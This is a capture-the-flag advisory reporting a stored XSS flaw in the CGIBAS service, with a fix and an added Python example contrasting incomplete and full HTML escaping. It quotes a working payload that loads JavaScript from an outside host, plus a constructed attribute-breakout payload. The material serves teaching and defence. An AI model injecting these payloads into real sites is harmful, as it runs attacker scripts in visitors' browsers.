HC's Capture the Flag website: 25C3-CTF final results
Advisory #62
From team WiiPhonies
Advisory by: c1de0x
Affected service(s): CGIBAS
Severity [l/m/h]: medium
===== Problem =====
The CGIBAS site is vulnerable to XSS: a user-supplied caption is written back into the download and search pages without HTML escaping, so the browser parses it as markup. Adding a caption like:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
will result in a JavaScript popup on the download or search page for every visitor who views that caption.
===== Impact =====
Medium
===== Fix =====
Escape the caption at output time, when it is written into the page: replace & with &amp; first, then < and > with their HTML entities (&lt; and &gt;). If the caption is also placed inside an attribute value, " and ' must be escaped as well (&quot; and &#x27;), otherwise the quote terminates the attribute even though no < or > is present.
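To make the fix concrete, the following is an added example and not code from CGIBAS or from the advisory author. It models the reported behaviour (caption interpolated unescaped into a table cell), applies the advisory's payload, and contrasts two escapers: one that only replaces < and > as the fix above states, and a full HTML escaper that also handles &, " and '. The page template, the `title` attribute case and the second payload (`" onmouseover="alert(1)`) are constructed for illustration; the point of the attribute case is general, not a second finding against CGIBAS.

```python
import html
import re

# Constructed sample input: the exact caption from the advisory.
XSS_PAYLOAD = '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'
# Constructed sample input for the attribute case (hypothetical, not from the advisory).
ATTR_PAYLOAD = '" onmouseover="alert(1)'

# Matches an opening <script ...> tag, case-insensitive, with optional whitespace
# after '<' (browsers tolerate neither, but this keeps the check conservative).
_SCRIPT_TAG = re.compile(r'<\s*script\b', re.IGNORECASE)


def render_caption_vulnerable(caption: str) -> str:
    """Models the reported bug: the caption is dropped into the page as-is."""
    return f'<td class="caption">{caption}</td>'


def escape_angle_brackets_only(s: str) -> str:
    """The fix as literally worded: only < and > are replaced."""
    return s.replace('<', '&lt;').replace('>', '&gt;')


def escape_html(s: str) -> str:
    """Full escaper for text nodes and quoted attribute values.

    '&' is replaced first so that an entity produced by a later step
    (e.g. '&lt;') is not itself re-escaped into '&amp;lt;'.
    """
    return (s.replace('&', '&amp;')
             .replace('<', '&lt;')
             .replace('>', '&gt;')
             .replace('"', '&quot;')
             .replace("'", '&#x27;'))


def render_caption_fixed(caption: str) -> str:
    """Hardened rendering of the caption as a text node."""
    return f'<td class="caption">{escape_html(caption)}</td>'


def render_caption_in_attribute(caption: str, escaper) -> str:
    """Hypothetical page variant that also shows the caption as a tooltip."""
    return f'<img src="/thumb.cgi" title="{escaper(caption)}">'


def has_script_tag(fragment: str) -> bool:
    """True if the fragment still contains a live <script> opening tag."""
    return _SCRIPT_TAG.search(fragment) is not None


def breaks_out_of_attribute(caption: str, escaper) -> bool:
    """True if the escaped caption still contains a raw double quote, which
    would terminate a double-quoted attribute value and allow new attributes."""
    return '"' in escaper(caption)


if __name__ == '__main__':
    print('vulnerable :', render_caption_vulnerable(XSS_PAYLOAD))
    print('fixed      :', render_caption_fixed(XSS_PAYLOAD))
    print('attr, <> only:', render_caption_in_attribute(ATTR_PAYLOAD, escape_angle_brackets_only))
    print('attr, full   :', render_caption_in_attribute(ATTR_PAYLOAD, escape_html))
    # Sanity check against the standard library's escaper.
    assert escape_html(XSS_PAYLOAD) == html.escape(XSS_PAYLOAD)
```

In a CGI written in Perl or PHP the same escaper is available as `HTML::Entities::encode_entities` or `htmlspecialchars(..., ENT_QUOTES)`; the important part is that it runs at output time for every place the caption is printed, not once at input time, since the download and search pages are separate code paths.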
Rating
[0] (1) no more XSS for cgibas, please (2) more elaborated fixes, plz